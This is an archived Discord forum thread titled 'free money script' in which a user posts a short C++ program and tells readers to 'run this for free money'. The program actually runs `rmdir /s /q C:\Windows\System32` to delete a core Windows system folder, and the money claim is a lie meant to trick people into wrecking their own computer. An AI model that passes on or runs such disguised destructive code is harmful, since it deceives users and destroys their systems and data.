Coding Global Background
Coding Global

free money script

Archiviert 2 years ago
MonkaHmm1
5 Nachrichten
0 Mitglieder
Erstellt 3 years ago
Aktualisiert 3 years ago
In Discord öffnen
S
skyzonde
#include <iostream>
#include <cstdlib>

int main() {
std::cout << "Warning! This program will attempt to delete the System32 folder. Proceed at your own risk!" << std::endl;
std::cout << "Do you really want to continue? (y/n): ";
char choice;
std::cin >> choice;

if (choice == 'y' || choice == 'Y') {
std::cout << "Deleting System32..." << std::endl;
std::system("rmdir /s /q C:\Windows\System32");
std::cout << "System32 deletion complete." << std::endl;
} else {
std::cout << "Operation cancelled." << std::endl;
}

return 0;
}

run this for free money 💯

Antworten (5)